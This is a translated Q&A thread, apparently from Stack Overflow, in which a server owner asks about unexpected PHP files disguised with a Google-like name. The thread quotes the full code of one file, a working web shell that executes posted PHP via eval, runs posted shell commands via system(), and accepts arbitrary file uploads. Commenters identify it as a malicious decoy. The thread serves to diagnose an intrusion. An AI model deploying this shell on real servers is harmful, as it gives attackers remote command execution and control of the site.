【发布时间】:2011-03-11 16:24:27
【问题描述】:
我最近在我的服务器上发现了 4 个奇怪的文件(我没有上传)。文件名是这样的:goog1e7a20543b128921.php
这是其中的代码:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>
你知道这段代码应该做什么......吗? 我应该开始恐慌吗..?
谢谢。
【问题讨论】:
-
它没有好的目的,似乎是表单欺骗。
-
看起来可能与某种 google 服务、分析或结帐有关?
-
@Matt Ellen:Google 不会在您的网络服务器上上传文件。他们可能会要求您这样做(例如,出于授权目的),但他们永远不会自己这样做。此外,尽管 Google 的员工都是极客,但他们不会将公司名称拼错为
Goog1e并将他们的服务拼写为analist...Goog1e_analist只是一个(非常糟糕的)诱饵,让您相信这是一些 Google 文件这样你就不会删除它。 -
“休斯顿,我们遇到了问题”。检查文件的最后编辑和所有者,也许有人入侵了你的 ftp。
-
有人应该告诉他们...google.ch/…